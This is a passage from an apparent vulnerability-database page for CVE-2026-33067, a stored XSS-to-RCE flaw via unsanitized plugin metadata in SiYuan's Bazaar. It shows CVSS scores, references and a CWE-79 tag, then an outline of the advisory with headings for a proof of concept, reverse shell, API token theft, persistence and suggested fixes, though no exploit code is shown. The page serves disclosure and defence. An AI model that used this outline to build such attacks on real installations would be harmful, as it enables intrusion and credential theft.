          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 6.0,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "LOW",
          "subIntegrityImpact": "LOW",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-20T09:16:14.863",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-mvpm-v6q4-m2pf"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-mvpm-v6q4-m2pf"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33067 (GCVE-0-2026-33067)

GHSA-MVPM-V6Q4-M2PF

Stored XSS to RCE via Unsanitized Bazaar Package Metadata

Summary

Affected Component

Affected Versions

Severity

Vulnerable Code

Proof of Concept

Step 1: Create a malicious plugin manifest

Step 2: Submit to Bazaar

Step 3: Zero-click RCE

Escalation: Reverse shell

Escalation: Data exfiltration (API token theft)

Escalation: Silent persistence (Windows)

Attack Scenario

Impact

Suggested Fix

1. Escape all package metadata in template rendering (bazaar.ts)

2. Server-side sanitization in the Bazaar index pipeline

3. Long-term: Harden Electron configuration

FKIE_CVE-2026-33067

Tags

Sightings

Nomenclature

1. Escape all package metadata in template rendering (`bazaar.ts`)